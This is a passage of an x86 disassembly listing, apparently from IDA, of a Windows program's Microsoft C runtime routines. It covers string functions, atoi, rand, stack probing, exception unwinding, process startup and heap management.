add ecx, 4
test eax, 81010100h
jz short loc_403D41
test dl, dl
jz short loc_403D98
test dh, dh
jz short loc_403D8F
test edx, 0FF0000h
jz short loc_403D82
test edx, 0FF000000h
jz short loc_403D7A
jmp short loc_403D41
; ---------------------------------------------------------------------------
loc_403D7A: ; CODE XREF: sub_403CC0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_403D82: ; CODE XREF: sub_403CC0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_403D8F: ; CODE XREF: sub_403CC0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_403D98: ; CODE XREF: sub_403CC0+72�j
; sub_403CC0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_403CC0 endp
; =============== S U B R O U T I N E =======================================
sub_403DA0 proc near ; CODE XREF: sub_4018FD+428�p
; sub_4018FD+6E2�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_403DA8: ; CODE XREF: sub_403DA0+34�j
cmp dword_40DC8C, 1
jle short loc_403DC0
movzx eax, byte ptr [edi]
push 8
push eax
call sub_40617E
pop ecx
pop ecx
jmp short loc_403DCF
; ---------------------------------------------------------------------------
loc_403DC0: ; CODE XREF: sub_403DA0+F�j
movzx eax, byte ptr [edi]
mov ecx, off_40DA80
mov al, [ecx+eax*2]
and eax, 8
loc_403DCF: ; CODE XREF: sub_403DA0+1E�j
test eax, eax
jz short loc_403DD6
inc edi
jmp short loc_403DA8
; ---------------------------------------------------------------------------
loc_403DD6: ; CODE XREF: sub_403DA0+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_403DE6
cmp esi, 2Bh
jnz short loc_403DEA
loc_403DE6: ; CODE XREF: sub_403DA0+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_403DEA: ; CODE XREF: sub_403DA0+44�j
xor ebx, ebx
loc_403DEC: ; CODE XREF: sub_403DA0+7B�j
cmp dword_40DC8C, 1
jle short loc_403E01
push 4
push esi
call sub_40617E
pop ecx
pop ecx
jmp short loc_403E0C
; ---------------------------------------------------------------------------
loc_403E01: ; CODE XREF: sub_403DA0+53�j
mov eax, off_40DA80
mov al, [eax+esi*2]
and eax, 4
loc_403E0C: ; CODE XREF: sub_403DA0+5F�j
test eax, eax
jz short loc_403E1D
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_403DEC
; ---------------------------------------------------------------------------
loc_403E1D: ; CODE XREF: sub_403DA0+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_403E26
neg eax
loc_403E26: ; CODE XREF: sub_403DA0+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_403DA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E30 proc near ; CODE XREF: sub_4018FD+38E�p
; sub_404387+93�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_403E61
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_403E5F
jz short loc_403E61
dec ecx
dec ecx
loc_403E5F: ; CODE XREF: sub_403E30+29�j
not ecx
loc_403E61: ; CODE XREF: sub_403E30+9�j
; sub_403E30+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_403E30 endp
; =============== S U B R O U T I N E =======================================
sub_403E68 proc near ; CODE XREF: sub_4018FD+58�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_40BA20, eax
retn
sub_403E68 endp
; =============== S U B R O U T I N E =======================================
sub_403E72 proc near ; CODE XREF: sub_4018FD:loc_40197B�p
mov eax, dword_40BA20
imul eax, 343FDh
add eax, 269EC3h
mov dword_40BA20, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_403E72 endp
; =============== S U B R O U T I N E =======================================
sub_403E90 proc near ; CODE XREF: sub_4018FD+24�p
; sub_402AC3+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_403EB0
loc_403E9C: ; CODE XREF: sub_403E90+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_403E9C
loc_403EB0: ; CODE XREF: sub_403E90+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_403E90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403EC0 proc near ; CODE XREF: sub_403FB8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_403ED8
push [ebp+arg_0]
call sub_4094A0 ; RtlUnwind
loc_403ED8: ; DATA XREF: sub_403EC0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403EC0 endp
; =============== S U B R O U T I N E =======================================
sub_403EE0 proc near ; DATA XREF: sub_403F02+A�o
; seg001:00403F73�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_403F01
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_403F01: ; CODE XREF: sub_403EE0+10�j
retn
sub_403EE0 endp
; =============== S U B R O U T I N E =======================================
sub_403F02 proc near ; CODE XREF: sub_403FB8+67�p
; sub_403FB8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_403EE0
push large dword ptr fs:0
mov large fs:0, esp
loc_403F1F: ; CODE XREF: sub_403F02:loc_403F5A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_403F5C
cmp esi, [esp+1Ch+arg_4]
jz short loc_403F5C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_403F5A
push 101h
mov eax, [ebx+esi*4+8]
call sub_403F96
call dword ptr [ebx+esi*4+8]
loc_403F5A: ; CODE XREF: sub_403F02+44�j
jmp short loc_403F1F
; ---------------------------------------------------------------------------
loc_403F5C: ; CODE XREF: sub_403F02+2A�j
; sub_403F02+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_403F02 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_403EE0
jnz short locret_403F8C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_403F8C
mov eax, 1
locret_403F8C: ; CODE XREF: seg001:00403F7A�j
; seg001:00403F85�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_40BA30
jmp short loc_403FA0
; =============== S U B R O U T I N E =======================================
sub_403F96 proc near ; CODE XREF: sub_403F02+4F�p
; sub_403FB8+78�p
push ebx
push ecx
mov ebx, offset dword_40BA30
mov ecx, [ebp+8]
loc_403FA0: ; CODE XREF: seg001:00403F94�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403F96 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FB8 proc near ; DATA XREF: sub_4018FD+A�o
; sub_404200+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_404058
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_403FEB: ; CODE XREF: sub_403FB8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_404051
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40403F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40403F
js short loc_40404A
mov edi, [ebx+8]
push ebx
call sub_403EC0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_403F02
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403F96
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40403F: ; CODE XREF: sub_403FB8+40�j
; sub_403FB8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_403FEB
; ---------------------------------------------------------------------------
loc_40404A: ; CODE XREF: sub_403FB8+54�j
mov eax, 0
jmp short loc_40406D
; ---------------------------------------------------------------------------
loc_404051: ; CODE XREF: sub_403FB8+36�j
mov eax, 1
jmp short loc_40406D
; ---------------------------------------------------------------------------
loc_404058: ; CODE XREF: sub_403FB8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_403F02
add esp, 8
pop ebp
mov eax, 1
loc_40406D: ; CODE XREF: sub_403FB8+97�j
; sub_403FB8+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403FB8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_403F02
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404090 proc near ; CODE XREF: sub_4025AD+F5�p
; sub_4025AD+10E�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_405917
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_4040CF
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4040DC
; ---------------------------------------------------------------------------
loc_4040CF: ; CODE XREF: sub_404090+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_405802
pop ecx
pop ecx
loc_4040DC: ; CODE XREF: sub_404090+3D�j
mov eax, esi
pop esi
leave
retn
sub_404090 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
lea eax, dword_40E478
cmp dword ptr [eax+8], 0
jnz short loc_404143
mov al, 0FFh
mov edi, edi
loc_40410C: ; CODE XREF: seg001:00404118�j
; seg001:00404138�j
or al, al
jz short loc_40413E
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_40410C
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_40410C
sbb al, al
sbb al, 0FFh
loc_40413E: ; CODE XREF: seg001:0040410E�j
movsx eax, al
jmp short loc_404177
; ---------------------------------------------------------------------------
loc_404143: ; CODE XREF: seg001:00404106�j
mov eax, 0FFh
xor ebx, ebx
mov edi, edi
loc_40414C: ; CODE XREF: seg001:00404158�j
; seg001:00404170�j
or al, al
jz short loc_404177
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_40414C
push eax
push ebx
call sub_406234
mov ebx, eax
add esp, 4
call sub_406234
add esp, 4
cmp bl, al
jz short loc_40414C
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_404177: ; CODE XREF: seg001:00404141�j
; seg001:0040414E�j
pop ebx
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404180 proc near ; CODE XREF: sub_402D53+4F�p
; sub_4032FB+2F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_4041FA
mov dh, [ecx+1]
test dh, dh
jz short loc_4041E7
loc_404198: ; CODE XREF: sub_404180+52�j
; sub_404180+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_4041BA
test al, al
jz short loc_4041B4
loc_4041A9: ; CODE XREF: sub_404180+32�j
mov al, [esi]
inc esi
loc_4041AC: ; CODE XREF: sub_404180+3F�j
cmp al, dl
jz short loc_4041BA
test al, al
jnz short loc_4041A9
loc_4041B4: ; CODE XREF: sub_404180+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4041BA: ; CODE XREF: sub_404180+23�j
; sub_404180+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_4041AC
lea edi, [esi-1]
loc_4041C4: ; CODE XREF: sub_404180+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_4041F3
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_404198
mov al, [ecx+3]
test al, al
jz short loc_4041F3
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4041C4
jmp short loc_404198
; ---------------------------------------------------------------------------
loc_4041E7: ; CODE XREF: sub_404180+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_406316
; ---------------------------------------------------------------------------
loc_4041F3: ; CODE XREF: sub_404180+49�j
; sub_404180+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_4041FA: ; CODE XREF: sub_404180+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_404180 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404200 proc near ; DATA XREF: seg002:00417FD8�o
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40A1C8
push offset sub_403FB8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call dword_40A138 ; GetVersion
xor edx, edx
mov dl, ah
mov dword_40E410, edx
mov ecx, eax
and ecx, 0FFh
mov dword_40E40C, ecx
shl ecx, 8
add ecx, edx
mov dword_40E408, ecx
shr eax, 10h
mov dword_40E404, eax
xor esi, esi
push esi
call sub_4044CF
pop ecx
test eax, eax
jnz short loc_40426C
push 1Ch
call sub_40431B
pop ecx
loc_40426C: ; CODE XREF: sub_404200+62�j
mov [ebp+var_4], esi
call sub_4069E0
call dword_40A134 ; GetCommandLineA
mov dword_410648, eax
call sub_4068AE
mov dword_40E460, eax
call sub_406661
call sub_4065A8
call sub_4038D4
mov [ebp+var_30], esi
lea eax, [ebp+var_5C]
push eax
call dword_40A130 ; GetStartupInfoA
call sub_406550
mov [ebp+var_64], eax
test byte ptr [ebp+var_30], 1
jz short loc_4042B9
movzx eax, [ebp+var_2C]
jmp short loc_4042BC
; ---------------------------------------------------------------------------
loc_4042B9: ; CODE XREF: sub_404200+B1�j
push 0Ah
pop eax
loc_4042BC: ; CODE XREF: sub_404200+B7�j
push eax
push [ebp+var_64]
push esi
push esi
call dword_40A12C ; GetModuleHandleA
push eax
call sub_4032FB
mov [ebp+var_60], eax
push eax
call sub_403901
mov eax, [ebp+var_14]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp+var_68], ecx
push eax
push ecx
call sub_4063CC
pop ecx
pop ecx
retn
sub_404200 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_403912
; =============== S U B R O U T I N E =======================================
sub_4042F6 proc near ; CODE XREF: sub_4065A8+4E�p
; sub_4065A8+7D�p ...
arg_0 = dword ptr 4
cmp dword_40E468, 1
jnz short loc_404304
call sub_406B8B
loc_404304: ; CODE XREF: sub_4042F6+7�j
push [esp+arg_0]
call sub_406BC4
push 0FFh
call off_40BA40
pop ecx
pop ecx
retn
sub_4042F6 endp
; =============== S U B R O U T I N E =======================================
sub_40431B proc near ; CODE XREF: sub_404200+66�p
arg_0 = dword ptr 4
cmp dword_40E468, 1
jnz short loc_404329
call sub_406B8B
loc_404329: ; CODE XREF: sub_40431B+7�j
push [esp+arg_0]
call sub_406BC4
pop ecx
push 0FFh
call dword_40A0D4 ; ExitProcess
retn
sub_40431B endp
; =============== S U B R O U T I N E =======================================
sub_40433F proc near ; CODE XREF: sub_403470+1F�p
; sub_408845+8A�p ...
arg_0 = dword ptr 4
mov eax, dword_40E470
test eax, eax
jz short loc_404357
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_404357
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404357: ; CODE XREF: sub_40433F+7�j
; sub_40433F+12�j
xor eax, eax
retn
sub_40433F endp
; =============== S U B R O U T I N E =======================================
sub_40435A proc near ; CODE XREF: sub_404387+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call dword_40A12C ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_404385
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_404385
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_404385: ; CODE XREF: sub_40435A+15�j
; sub_40435A+1C�j
pop esi
retn
sub_40435A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404387 proc near ; CODE XREF: sub_4044CF+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_403E90
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call dword_40A140 ; GetVersionExA
test eax, eax
jz short loc_4043CA
cmp [ebp+var_88], 2
jnz short loc_4043CA
cmp [ebp+var_94], 5
jb short loc_4043CA
push 1
pop eax
jmp loc_4044CC
; ---------------------------------------------------------------------------
loc_4043CA: ; CODE XREF: sub_404387+27�j
; sub_404387+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call dword_40A13C ; GetEnvironmentVariableA
test eax, eax
jz loc_4044B9
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_40440C
loc_4043F9: ; CODE XREF: sub_404387+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_404407
cmp al, 7Ah
jg short loc_404407
sub al, 20h
mov [ecx], al
loc_404407: ; CODE XREF: sub_404387+76�j
; sub_404387+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_4043F9
loc_40440C: ; CODE XREF: sub_404387+70�j
lea eax, [ebp+var_122C]
push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_403E30
add esp, 0Ch
test eax, eax
jnz short loc_40442E
lea eax, [ebp+var_122C]
jmp short loc_404477
; ---------------------------------------------------------------------------
loc_40442E: ; CODE XREF: sub_404387+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call dword_40A0C0 ; GetModuleFileNameA
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_404462
loc_40444F: ; CODE XREF: sub_404387+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_40445D
cmp al, 7Ah
jg short loc_40445D
sub al, 20h
mov [ecx], al
loc_40445D: ; CODE XREF: sub_404387+CC�j
; sub_404387+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_40444F
loc_404462: ; CODE XREF: sub_404387+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_404180
pop ecx
pop ecx
loc_404477: ; CODE XREF: sub_404387+A5�j
cmp eax, ebx
jz short loc_4044B9
push 2Ch
push eax
call sub_406310
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4044B9
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_40449E
loc_404490: ; CODE XREF: sub_404387+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_404499
mov [ecx], bl
jmp short loc_40449A
; ---------------------------------------------------------------------------
loc_404499: ; CODE XREF: sub_404387+10C�j
inc ecx
loc_40449A: ; CODE XREF: sub_404387+110�j
cmp [ecx], bl
jnz short loc_404490
loc_40449E: ; CODE XREF: sub_404387+107�j
push 0Ah
push ebx
push eax
call sub_406D17
add esp, 0Ch
cmp eax, 2
jz short loc_4044CC
cmp eax, 3
jz short loc_4044CC
cmp eax, 1
jz short loc_4044CC
loc_4044B9: ; CODE XREF: sub_404387+5C�j
; sub_404387+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_40435A
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_4044CC: ; CODE XREF: sub_404387+3E�j
; sub_404387+126�j ...
pop ebx
leave
retn
sub_404387 endp
; =============== S U B R O U T I N E =======================================
sub_4044CF proc near ; CODE XREF: sub_404200+5A�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_40A148 ; HeapCreate
test eax, eax
mov dword_410640, eax
jz short loc_404525
call sub_404387
cmp eax, 3
mov dword_410644, eax
jnz short loc_40450B
push 3F8h
call sub_40452C
pop ecx
jmp short loc_404515
; ---------------------------------------------------------------------------
loc_40450B: ; CODE XREF: sub_4044CF+2D�j
cmp eax, 2
jnz short loc_404528
call sub_405073
loc_404515: ; CODE XREF: sub_4044CF+3A�j
test eax, eax
jnz short loc_404528
push dword_410640
call dword_40A144 ; HeapDestroy
loc_404525: ; CODE XREF: sub_4044CF+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_404528: ; CODE XREF: sub_4044CF+3F�j
; sub_4044CF+48�j
push 1
pop eax
retn
sub_4044CF endp
; =============== S U B R O U T I N E =======================================
sub_40452C proc near ; CODE XREF: sub_4044CF+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_410640
call dword_40A110 ; RtlAllocateHeap
test eax, eax
mov dword_410638, eax
jnz short loc_404549
retn
; ---------------------------------------------------------------------------
loc_404549: ; CODE XREF: sub_40452C+1A�j
mov ecx, [esp+arg_0]
and dword_410630, 0
and dword_410634, 0
push 1
mov dword_41062C, eax
mov dword_41063C, ecx
mov dword_410624, 10h
pop eax
retn
sub_40452C endp
; =============== S U B R O U T I N E =======================================
sub_404574 proc near ; CODE XREF: sub_403B18+17�p
; sub_40915F+4C�p ...
arg_0 = dword ptr 4
mov eax, dword_410634
lea ecx, [eax+eax*4]
mov eax, dword_410638
lea ecx, [eax+ecx*4]
loc_404584: ; CODE XREF: sub_404574+26�j
cmp eax, ecx
jnb short loc_40459C
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_40459E
add eax, 14h
jmp short loc_404584
; ---------------------------------------------------------------------------
loc_40459C: ; CODE XREF: sub_404574+12�j
xor eax, eax
locret_40459E: ; CODE XREF: sub_404574+21�j
retn
sub_404574 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40459F proc near ; CODE XREF: sub_403B18+23�p
; sub_40915F+A4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_4048C3
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_404675
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_404603
push 3Fh
pop edx
loc_404603: ; CODE XREF: sub_40459F+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_404657
cmp edx, 20h
jnb short loc_40462E
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_40464F
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_40464F
; ---------------------------------------------------------------------------
loc_40462E: ; CODE XREF: sub_40459F+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_40464F
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_40464F: ; CODE XREF: sub_40459F+86�j
; sub_40459F+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_40465A
; ---------------------------------------------------------------------------
loc_404657: ; CODE XREF: sub_40459F+6A�j
mov ecx, [ebp+var_4]
loc_40465A: ; CODE XREF: sub_40459F+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_404675: ; CODE XREF: sub_40459F+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_404683
push 3Fh
pop edx
loc_404683: ; CODE XREF: sub_40459F+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_404726
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_4046A8
mov ebx, esi
loc_4046A8: ; CODE XREF: sub_40459F+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_4046BA
mov edx, esi
loc_4046BA: ; CODE XREF: sub_40459F+117�j
cmp ebx, edx
jz short loc_404721
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_404709
cmp ebx, 20h
jnb short loc_4046EA
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_404709
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_404709
; ---------------------------------------------------------------------------
loc_4046EA: ; CODE XREF: sub_40459F+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_404709
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_404709: ; CODE XREF: sub_40459F+128�j
; sub_40459F+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_404721: ; CODE XREF: sub_40459F+11D�j
mov esi, [ebp+arg_4]
jmp short loc_404729
; ---------------------------------------------------------------------------
loc_404726: ; CODE XREF: sub_40459F+ED�j
mov ebx, [ebp+arg_0]
loc_404729: ; CODE XREF: sub_40459F+185�j
cmp [ebp+var_C], 0
jnz short loc_404737
cmp ebx, edx
